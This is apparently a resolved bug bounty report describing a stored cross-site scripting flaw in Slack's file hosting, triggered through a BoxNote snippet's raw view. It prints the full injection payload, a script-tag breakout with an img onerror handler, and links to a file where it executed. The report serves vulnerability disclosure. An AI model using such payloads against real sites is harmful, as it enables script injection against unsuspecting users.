a stored xss issue in https://files.slack.com
S
Slack
Submitted None
Actions:
Reported by
securitythinker
Vulnerability Details
Technical details and impact analysis
when making a BoxNote snippet with this xss payload:
XSS") ;</script> <img src="<img src=search"/onerror=alert(document.domain)//"> "><marquee>
when snippet made: and use the "view raw" xss payload will be executed
my ex: link where xss payload executed:
https://files.slack.com/files-pri/T027N7MK3-F1NCA92JF/XSS______script___img_src___img_src_search__onerror_alert__Xss__________marquee__boxnote.boxnote
that link will be executed in entire team mate that could probably used in exploitation.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$500.00
Submitted
Weakness
Cross-site Scripting (XSS) - Generic